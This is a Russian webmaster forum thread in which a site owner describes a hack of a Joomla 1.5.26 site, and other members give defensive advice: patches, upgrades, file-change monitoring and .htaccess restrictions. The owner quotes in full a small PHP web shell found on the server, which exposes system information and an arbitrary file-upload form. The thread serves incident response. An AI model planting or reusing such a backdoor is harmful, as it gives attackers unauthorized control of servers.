- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Вобщем позавчера получили от хостера письмо претензию. Письмо - пересылка хостера претензии от дата центра. Вобщем в претензии указывалось на некий текстовой файл в каталоге одного из сайтов
Содержание текстового файла
hacked by НИК первого хакера and НИК второго хакера
Попутно был обнаружен пустой php файл, который находился с каталоге www, последний корневой каталок папок с сайтами. Такой же файл находился в в корневом каталоге одного из сайтов, рядом с текстовым файлом, про который писалось выше. Второй php файл не был пустым и содержал такой код
<?php if(isset($_GET["howwm"])){echo"[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?>Вобщем файлы были удалены, в логах найден ip взломщика, были проведены некоторые действия по защите Joomla.
Сегодня в папке тогоже сайта был найден новый php файл (смотрим вложения)
По вчерашним логам IP взломщика было видно обращения к php файлу а также к одному из установленных модулей, а точнее к конфигурационному файлу. По сегодняшним логам IP взломщика взломщика видно обращение к файлу a.php больше никаких обращений. Один момент - было обращение ко вчерашним файлам, которые были удалены. Из логов видно что IP ротируются.
Теперь вопросы. Вопросы банальны - откуда копать, откуда могли взломать, что делать.
Версия Joomla 1.5.26
Что делать, что делать.. На другую CMS переезжать. У товарища тоже, что не Джумла, то взлом раз в месяц. Юзайте Друпал - ни одного взлома за 5 лет
проверьте ай-болитом для начала
модули/плагины обновлены?
Проблемма в том что модули плагины из паблика. Версии актуальные.
PS у меня была инструкция как средствами .htaccess блокировать (или вести журнал) при обращении к определенному файлу. Возможно у кого нибудь есть интрукция, как средствами .htaccess блокировать выполнение php файлов кроме файлов, к примеру index.php
Или как вариант запрет на создание любых новых php/js файлов в определенной дирректории, или глобально во всех папках указанного сайта.
Или любая другая информация о защите через .htaccess
Спасибо.
PS переход с Joomla на другой... ну в моем случае это просто закрыть сайт.
Еще и патч безопасности есть на Joomla 1.5.26
http://joomlaportal.ru/content/view/2364/57/
Регистрация пользователей разрешена на сайте ?
Вот это поставьте http://santivi.com/ - бесплатно следит кто, что и когда изменено + уведомление на почту
Регистрация пользователей разрешена на сайте ?
Да, конечно. Там форум, социальная сеть
компонент,редактор JCE , nnframework ?
лучше бы обновились на последнюю версию джумлы из второй или третьей ветки.
ветку 1.x использовать уже смысла нет (прям чувствовал что 1,5 версия у вас)
Уже бы давно обновились бы, но разработчики шалона не обновили его до трешки. Адаптация проблемма - фирменый фрейморк переписывать с нуля дороговато будет.
Сделали все рекомендации, пока полет нормальный (как бы не сглазить). Санти антивирус вообще находка - пасет файловую систему.
PS страшновато запускать с сервера файл в аттаче, интересно что за сценарий он выполняет.
PS страшновато запускать с сервера файл в аттаче, интересно что за сценарий он выполняет.
http://forum.antichat.net/thread103155.html